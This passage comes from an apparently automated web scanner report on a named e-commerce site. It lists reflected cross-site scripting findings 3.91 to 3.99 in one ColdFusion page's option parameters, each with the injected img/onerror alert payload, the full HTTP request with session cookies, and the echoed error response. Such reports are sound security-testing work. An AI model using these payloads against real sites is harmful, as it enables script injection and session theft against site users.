ptions=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570c4005<img%20src%3da%20onerror%3dalert(1)>d2da79f8cd3&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 570c4005<img src=a onerror=alert(1)>d2da79f8cd3 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:22:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:22:56 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 570c4005<img src=a onerror=alert(1)>d2da79f8cd3 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.91. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue91 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue91 request parameter is copied into the HTML document as plain text between tags. The payload 25a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3 was submitted in the buyForm3021_optionValue91 parameter. This input was echoed as 25a69<img src=a onerror=alert(1)>60e211932b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=62025a69<img%20src%3da%20onerror%3dalert(1)>60e211932b3&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 62025a69<img src=a onerror=alert(1)>60e211932b3 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:16:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:16:42 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 62025a69<img src=a onerror=alert(1)>60e211932b3 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.92. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue92 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue92 request parameter is copied into the HTML document as plain text between tags. The payload a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2 was submitted in the buyForm3021_optionValue92 parameter. This input was echoed as a35d0<img src=a onerror=alert(1)>63093daffc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646a35d0<img%20src%3da%20onerror%3dalert(1)>63093daffc2&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 646a35d0<img src=a onerror=alert(1)>63093daffc2 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:15:42 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:15:42 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 646a35d0<img src=a onerror=alert(1)>63093daffc2 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.93. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue93 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue93 request parameter is copied into the HTML document as plain text between tags. The payload 3ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94 was submitted in the buyForm3021_optionValue93 parameter. This input was echoed as 3ca31<img src=a onerror=alert(1)>c3f9fe35a94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=6683ca31<img%20src%3da%20onerror%3dalert(1)>c3f9fe35a94&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_opt
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 6683ca31<img src=a onerror=alert(1)>c3f9fe35a94 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:18:49 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:18:49 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 6683ca31<img src=a onerror=alert(1)>c3f9fe35a94 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.94. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue94 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue94 request parameter is copied into the HTML document as plain text between tags. The payload bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54 was submitted in the buyForm3021_optionValue94 parameter. This input was echoed as bd121<img src=a onerror=alert(1)>dd999491e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689bd121<img%20src%3da%20onerror%3dalert(1)>dd999491e54&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021

Response

HTTP/1.1 500 Invalid data 689bd121<img src=a onerror=alert(1)>dd999491e54 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:20:50 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:20:49 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 689bd121<img src=a onerror=alert(1)>dd999491e54 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.95. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue95 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue95 request parameter is copied into the HTML document as plain text between tags. The payload 8e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd was submitted in the buyForm3021_optionValue95 parameter. This input was echoed as 8e184<img src=a onerror=alert(1)>d5082daa7fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=7338e184<img%20src%3da%20onerror%3dalert(1)>d5082daa7fd&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_op
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 7338e184<img src=a onerror=alert(1)>d5082daa7fd for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:07:26 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:07:26 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 7338e184<img src=a onerror=alert(1)>d5082daa7fd for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.96. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue96 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue96 request parameter is copied into the HTML document as plain text between tags. The payload 40ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082 was submitted in the buyForm3021_optionValue96 parameter. This input was echoed as 40ff1<img src=a onerror=alert(1)>6c082eb0082 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ptions=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=74340ff1<img%20src%3da%20onerror%3dalert(1)>6c082eb0082&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_op
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 74340ff1<img src=a onerror=alert(1)>6c082eb0082 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:19:48 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:19:48 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 74340ff1<img src=a onerror=alert(1)>6c082eb0082 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.97. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue97 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue97 request parameter is copied into the HTML document as plain text between tags. The payload 2fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b was submitted in the buyForm3021_optionValue97 parameter. This input was echoed as 2fbf5<img src=a onerror=alert(1)>38934e0c95b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=7802fbf5<img%20src%3da%20onerror%3dalert(1)>38934e0c95b&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 7802fbf5<img src=a onerror=alert(1)>38934e0c95b for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:08:28 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:08:27 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 7802fbf5<img src=a onerror=alert(1)>38934e0c95b for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.98. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue98 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue98 request parameter is copied into the HTML document as plain text between tags. The payload 61958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497 was submitted in the buyForm3021_optionValue98 parameter. This input was echoed as 61958<img src=a onerror=alert(1)>7a7fc952497 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1
Content-Length: 994

noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=9
...[SNIP]...
ns=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=81461958<img%20src%3da%20onerror%3dalert(1)>7a7fc952497&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_opti
...[SNIP]...

Response

HTTP/1.1 500 Invalid data 81461958<img src=a onerror=alert(1)>7a7fc952497 for CFSQLTYPE CF_SQL_INTEGER.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:13:36 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:13:36 GMT
Content-Length: 14075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 81461958<img src=a onerror=alert(1)>7a7fc952497 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.99. http://www.munichmyway.com/templates/common/products/productProperties.cfm [buyForm3021_optionValue99 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.munichmyway.com
Path:   /templates/common/products/productProperties.cfm

Issue detail

The value of the buyForm3021_optionValue99 request parameter is copied into the HTML document as plain text between tags. The payload 3a9b7<img%20src%3da%20onerror%3dalert(1)>d450c3292d7 was submitted in the buyForm3021_optionValue99 parameter. This input was echoed as 3a9b7<img src=a onerror=alert(1)>d450c3292d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /templates/common/products/productProperties.cfm HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
